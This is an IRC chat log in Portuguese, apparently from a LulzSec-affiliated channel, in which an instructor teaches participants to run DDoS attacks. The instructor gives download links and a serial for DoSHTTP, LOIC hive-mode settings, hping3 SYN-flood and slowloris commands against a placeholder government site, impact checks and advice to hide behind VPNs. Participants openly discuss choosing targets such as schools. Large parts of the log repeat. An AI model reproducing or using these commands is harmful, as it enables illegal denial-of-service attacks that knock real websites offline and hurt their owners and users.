<emptydev> Yup.. DNS's...
<Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
* sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
<c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
* Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
<sc0rp> bem
<emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
<c0ldc0d3r> sim, que é a porta do site.
<tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
<Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
<c0ldc0d3r> o resto pouco interessa.
<Marmelo> qual a melhor dessas
<sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
<c0ldc0d3r> tuga, sim.
* neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
<sc0rp> penso que nao faz mal nenhum verem como se procede um attack
<sc0rp> http://videobam.com/nDOqA
<Marmelo> qual deles sera o melhor?
<c0ldc0d3r> o tcp e o http..
<c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
* Desligou (Ligação terminada no destino).
 FiSH: Chat in #aula will NOT be encrypted (no key found)
* A conversar em #aula
* ChanServ coloca o modo +q #aula c0ldc0d3r
* ChanServ coloca o modo de operador a c0ldc0d3r
<c0ldc0d3r> peço desculpa
<c0ldc0d3r> tive um problema na rede
<tuga> nao tou a perceber nada disto lol xD
<Marmelo> np
<sc0rp> é um pouco mais simplificado mas nao tem tantas opções
<tuga> na boa
* poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
<c0ldc0d3r> tuga, fizeste download das ferramentas?
<sc0rp> wireshark
<sc0rp> *
* Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
* ChanServ coloca o modo +q #aula Caravela|Lulz
* ChanServ coloca o modo de operador a Caravela|Lulz
<Marmelo> ah ok entao o wireshark fica mais simples ne?
<tuga> sim
<sc0rp> estava a mudar o portatil de sitio
<Made> DDos? :D
<sc0rp> no
<Marmelo> ok entao
<AntiSecPT278> no wireshark tens filtros
* PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
<sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
<sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
* Caravela|Lulz coloca o modo +m #aula
* ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
* AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
* unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
<c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<Marmelo> Relembro que usem vpn enquanto fazem isto!
<c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
<c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
<Caravela|Lulz> duvidas façam em pvt
<Caravela|Lulz> depois fazes copy paste aqui e respondes
<Caravela|Lulz> para nao haver spam
* kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
<c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
<Marmelo> caravela estava a ir bem
<Caravela|Lulz> ok
* Caravela|Lulz coloca o modo -m #aula
<Marmelo> ok alguma pergunta?
* c0ldc0d3r coloca o modo de operador a mitsai
* c0ldc0d3r oferece voz a mitsai
<Marmelo> Relembro que quem fizer spam leva ban imediato
* jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
<tuga> sim
<Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
<c0ldc0d3r> paste onde?
<tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
<c0ldc0d3r> piratepad?
<jgut> nights a tds
<c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
* PATRAOjhN agora chama-se afk_johnnyPATRAODANET
<Marmelo> lol ja acabou a aula?
<sc0rp> lol
* Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
* jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
<c0ldc0d3r> Marmelo, não há muito à dizer..
<Marmelo> pois nao lol
* jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
<tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
* Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
<c0ldc0d3r> agora é saber se o pessoal entendou..
* MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
<c0ldc0d3r> já vi que alguém conectou o loic ao hive..
<c0ldc0d3r> 2 pessoas
<trolololguy_> uma pergunta
<Made> c0ldc0der tens é de fazer ai uma auma de sqli
<AntiSecPT278> O tuga está com fé de ir dentro
* anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<Made> *uma
<Grep> c0ldc0d3r, para linux o LOIC é igual?
<trolololguy_> disseste anteriormente q udp era mais eficaz
<trolololguy_> podes dizer pq?
<Marmelo> LOIC nao da no linux
<trolololguy_> sr professor?
<c0ldc0d3r> Grep, sim
<c0ldc0d3r> é mais complicado
<c0ldc0d3r> mas não recomendo loic para linux..
<c0ldc0d3r> hping3 é mil vezes melhor
<Kondoriano> já começou?
<Marmelo> ah my bad pensava que o loic nao dava para o linux
<mitsai> sim mt melhor
<Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
<Grep> Marmelo, dar dá... com wine :P
<Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
* Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
<c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
* emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
<emptydev-> Caravela|Lulz
<emptydev-> PVT
* dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<emptydev-> http://pastebin.com/TfnBWewg
<emptydev-> Vejam
* fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<c0ldc0d3r> emptydev, boa.
* beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
* c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
<dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
<dgrdfg> visto que as duvidas são mais que muitas
<c0ldc0d3r> dgrdfg, poderás colocar aqui
<dgrdfg> e muitas questões são constantemente respondidas
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<dgrdfg> tipo sempre o msm
* An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
<beh> bem pensado
* inetking saiu (Ping timeout: 121 seconds)
* fx agora chama-se inetking
<c0ldc0d3r> podem usar este canal para ajuda..
<c0ldc0d3r> é na boa..
<dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
* jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
<dgrdfg> por exemplo
<dgrdfg> tenho uma duvida
* emptydev saiu (Ping timeout: 121 seconds)
* MaP05 saiu (Ping timeout: 122 seconds)
* l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
* Funho saiu (Ping timeout: 121 seconds)
<dgrdfg> ou servers
<dgrdfg> e como evitar que isso aconteça
* anarchy saiu (Ping timeout: 121 seconds)
<Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
* dgrdfg agora chama-se anarchy
<c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
* AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
<tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
<c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
<Made> amanha há aula?
<anarchy> pois foi o que eu pensei
<anarchy> há que pagar :F
<c0ldc0d3r> Grep, o nmap verifica com o teu ip
* VenusProject saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> o ping.eu não.
<anarchy> mas há vpn's que têm ports fechadas?
<c0ldc0d3r> tuga, ok
* ruicruz saiu (Ping timeout: 127 seconds)
* afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
* kaos saiu (Quit: Page closed)
<Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
* Kondoriano saiu (Ping timeout: 129 seconds)
* aula754 saiu (Ping timeout: 128 seconds)
* sc0rp saiu (Ping timeout: 129 seconds)
<c0ldc0d3r> proxychains poderá resultar...
<c0ldc0d3r> é uma questão de verificar
* w4r10ck saiu (Quit: )
* Hikas saiu (Ping timeout: 132 seconds)
* Caravela|Lulz saiu (Ping timeout: 125 seconds)
* l4m8d4 saiu (Ping timeout: 131 seconds)
* joao_ saiu (Ping timeout: 125 seconds)
* Marmelo saiu (Ping timeout: 122 seconds)
* trolololguy_ saiu (Ping timeout: 129 seconds)
* mitsai saiu (Ping timeout: 125 seconds)
* sh4d0wf40 saiu (Ping timeout: 157 seconds)
* l4m8d4_ agora chama-se l4m8d4
<Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
<emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
<c0ldc0d3r> emptydev-, link.
<c0ldc0d3r> que eu dou ao caravela
<c0ldc0d3r> para por no twitter
<Grep> só uma questão que eu cheguei a meio da aula...
<tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
<Grep> o hping3 substitui o DoSHTTP e o Loic certo?
<c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
<c0ldc0d3r> Grep, sim.
<An0nf40> tuga tu estás a fazer isso com uma vpn certo?
<tuga> nao lool
<An0nf40> ou estás simplesmente a testar sem nada lol
<c0ldc0d3r> vpn é necessário, visto que somos poucos..
<tuga> mas tipo
<c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
<tuga> eu ponho em perigo outras pessoas?
<c0ldc0d3r> mas como são poucos :\
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<aaaamitsai> +v +o
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<tuga> mas eu nao testei num site do governo
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<An0nf40> não precisa ser do governo lol
<mitsai> +v +o pl
* emptydev- saiu (Ping timeout: 121 seconds)
<An0nf40> eles dão mais importancia a esses...
<tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
<Grep> lol omg
* DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
* An0nf40 agora chama-se sh4d0wf40
<DaGun> boas, vao por a aula de hoje no pastebin?
<tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
<DaGun> e que tava com problemas na net e perdi uma parte
<DaGun> :S
<sh4d0wf40> lolol
<DaGun> xD
<tuga> dagun, ja puseram penso eu
<Made> DaGun http://pastebin.com/TfnBWewg]
<DaGun> só?
<c0ldc0d3r> tuga, sim e não.
* LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
<c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
<DaGun> é que eu isso apanhei xD
* MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
<tuga> ah ok
<mitsai> +v +o pls
<Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?

* w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
* Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
<Marmelo> boas
<c0ldc0d3r> boas
<AntiSecPT278> broas
<AntiSecPT278> xD
<Marmelo> c0ld voz me plss?
<Marmelo> olha que sacrificio
<Marmelo> estava eu a jogar
* c0ldc0d3r oferece voz a Marmelo
<Marmelo> e sai do windows so para vir para aqui
<Marmelo> tas a ver lol
* VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
* w4r10ck saiu (Ping timeout: 121 seconds)
* Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
* inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<Dagun> boas
* mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
* MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
* bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
* w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
* sc0rp (sc0rp@127.0.0.1) entrou em #aula
* joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
* AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
* Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
* trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
* JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
<c0ldc0d3r> Então pessoal, tudo bem com vocês?
<Marmelo> c0ld é melhor fazeres +m acho que é isso
<c0ldc0d3r> hum?
<Marmelo> eu estou +/-
<c0ldc0d3r> podes ir jogar lol
<wokmaster> could be better
<wokmaster> :)
<Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> népia
* emptydev (a@emptydev.google.suck.it) entrou em #aula
<c0ldc0d3r> senão como vão tirar dúvidas?
<emptydev> Que cena :o
<Marmelo> a sim por pvt pah
<Marmelo> como ontem
<Marmelo> senao é uma confusao ...
<c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
<Made> o prof tá atrasado 7 min bora bazar xD
* Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
<Marmelo> lol Made
<c0ldc0d3r> Made, hahah
<Made> :D
<mitsai> é aqui
<mitsai> +v
<mitsai> pl
<c0ldc0d3r> Mais uns 2 minutos e começamos.
<Marmelo> mas olha tamos tipo a explicar
<Marmelo> e vai vir um otario a fazer spam
<c0ldc0d3r> leva ban.
<Marmelo> se for como ontem 100+ pessoas
<Marmelo> imagina
<c0ldc0d3r> não vai ser lol
<c0ldc0d3r> irc está tudo mamado
<Marmelo> lol
<Marmelo> isso é bom entao lol
<AntiSecPT278> é neste ou no anonnet.org?
<c0ldc0d3r> é aqui a aula.
<AntiSecPT278> felizmente
<AntiSecPT278> o outro está péssimo
<c0ldc0d3r> ok, vamos dar início.
<w4r10ck> c0ld é que ta bue pessoal no anonnet
<AntiSecPT278> deviam actualizar o twitter com o correcto
<c0ldc0d3r> w4r10ck, tem que ser neste...
<w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
* krak-chevaliers saiu (Ping timeout: 121 seconds)
* tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
<c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
<c0ldc0d3r> para quem usa window$ claro.
<tuga> a aula já começou á muito? :/
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> tuga, acabou de começar.
<Marmelo> lol ainda nao começou praticamente
<Marmelo> vamos la
<Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<Marmelo> Pergunta : E o GoodBye?
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
<joao_> e quem tem linux ?
<c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
<c0ldc0d3r> joao_, já digo para quem tem linux.
* Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* l4m8d4 saiu (*.net *.split)
* wokmaster saiu (*.net *.split)
<c0ldc0d3r> poderão*
<c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
* l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
<tuga> pergunta: qual é o site que está a ser vitima entao?
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<AntiSecPT278> -.-
<c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
<c0ldc0d3r> Dúvidas?
<Marmelo> Sim
<Marmelo> o que queres dizer com rede ?
<c0ldc0d3r> a vossa própria "internet"
<c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
<Marmelo> ok
<c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
<c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
<mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
<mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
<Marmelo> ok ve se me lembras
<Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
<sc0rp> o loic sim da
<c0ldc0d3r> Made, humm..
<sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
<c0ldc0d3r> isso não serve de muito
* Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
<c0ldc0d3r> mandar 3 requests por segundo..
<c0ldc0d3r> nem faz muito sentido..
<c0ldc0d3r> porém, poderás usar o slowloris
* wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
<c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
<sc0rp> bem era esse que me estava a referir
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
<sc0rp> e nao o loic
<c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
<tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
<sc0rp> peço desculpa
<c0ldc0d3r> tuga, essa parte é só para quem usar linux
<c0ldc0d3r> usas linux?
<tuga> ah ok
<tuga> w vista
<c0ldc0d3r> emt
<tuga> nop
<c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
<emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
<tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
<c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
<emptydev> Yup.. DNS's...
<Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
* sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
<c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
* krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
* Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
<sc0rp> bem
<emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
<c0ldc0d3r> sim, que é a porta do site.
<tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
<Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
<c0ldc0d3r> o resto pouco interessa.
<Marmelo> qual a melhor dessas
<sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
<c0ldc0d3r> tuga, sim.
* neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
<c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
<sc0rp> penso que nao faz mal nenhum verem como se procede um attack
<sc0rp> http://videobam.com/nDOqA
<Marmelo> qual deles sera o melhor?
<c0ldc0d3r> o tcp e o http..
<c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
* Desligou (Ligação terminada no destino).
 FiSH: Chat in #aula will NOT be encrypted (no key found)
* A conversar em #aula
* ChanServ coloca o modo +q #aula c0ldc0d3r
* ChanServ coloca o modo de operador a c0ldc0d3r
<c0ldc0d3r> peço desculpa
<c0ldc0d3r> tive um problema na rede
<tuga> nao tou a perceber nada disto lol xD
<Marmelo> np
<sc0rp> é um pouco mais simplificado mas nao tem tantas opções
<tuga> na boa
* poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
<c0ldc0d3r> tuga, fizeste download das ferramentas?
<sc0rp> wireshark
<sc0rp> *
* Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
* ChanServ coloca o modo +q #aula Caravela|Lulz
* ChanServ coloca o modo de operador a Caravela|Lulz
<Marmelo> ah ok entao o wireshark fica mais simples ne?
<tuga> sim
<sc0rp> estava a mudar o portatil de sitio
<Made> DDos? :D
<sc0rp> no
<Marmelo> ok entao
<AntiSecPT278> no wireshark tens filtros
* PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
<sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
<sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
* Caravela|Lulz coloca o modo +m #aula
* ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
<c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
<c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
<c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
* AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
<c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
* aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
* unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
<c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
<c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
<Marmelo> Relembro que usem vpn enquanto fazem isto!
<c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
<c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
<Caravela|Lulz> duvidas façam em pvt
<Caravela|Lulz> depois fazes copy paste aqui e respondes
<Caravela|Lulz> para nao haver spam
* kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
<c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
<Marmelo> caravela estava a ir bem
<Caravela|Lulz> ok
* Caravela|Lulz coloca o modo -m #aula
<Marmelo> ok alguma pergunta?
* c0ldc0d3r coloca o modo de operador a mitsai
* c0ldc0d3r oferece voz a mitsai
<Marmelo> Relembro que quem fizer spam leva ban imediato
* jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
<tuga> sim
<Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
<c0ldc0d3r> paste onde?
<tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
<c0ldc0d3r> piratepad?
<jgut> nights a tds
<c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
* PATRAOjhN agora chama-se afk_johnnyPATRAODANET
<Marmelo> lol ja acabou a aula?
<sc0rp> lol
* Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
* jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
<c0ldc0d3r> Marmelo, não há muito à dizer..
<Marmelo> pois nao lol
* jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
<tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
* Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
<c0ldc0d3r> agora é saber se o pessoal entendou..
* MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
<c0ldc0d3r> já vi que alguém conectou o loic ao hive..
<c0ldc0d3r> 2 pessoas
<trolololguy_> uma pergunta
<Made> c0ldc0der tens é de fazer ai uma auma de sqli
<AntiSecPT278> O tuga está com fé de ir dentro
* anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<Made> *uma
<Grep> c0ldc0d3r, para linux o LOIC é igual?
<trolololguy_> disseste anteriormente q udp era mais eficaz
<trolololguy_> podes dizer pq?
<Marmelo> LOIC nao da no linux
<trolololguy_> sr professor?
<c0ldc0d3r> Grep, sim
<c0ldc0d3r> é mais complicado
<c0ldc0d3r> mas não recomendo loic para linux..
<c0ldc0d3r> hping3 é mil vezes melhor
<Kondoriano> já começou?
<Marmelo> ah my bad pensava que o loic nao dava para o linux
<mitsai> sim mt melhor
<Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
<Grep> Marmelo, dar dá... com wine :P
<Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
* Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
<c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
* emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
<emptydev-> Caravela|Lulz
<emptydev-> PVT
* dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
<emptydev-> http://pastebin.com/TfnBWewg
<emptydev-> Vejam
* fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
<c0ldc0d3r> emptydev, boa.
* beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
* c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
<dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
<dgrdfg> visto que as duvidas são mais que muitas
<c0ldc0d3r> dgrdfg, poderás colocar aqui
<dgrdfg> e muitas questões são constantemente respondidas
* aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
<dgrdfg> tipo sempre o msm
* An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
<beh> bem pensado
* inetking saiu (Ping timeout: 121 seconds)
* fx agora chama-se inetking
<c0ldc0d3r> podem usar este canal para ajuda..
<c0ldc0d3r> é na boa..
<dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
* jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
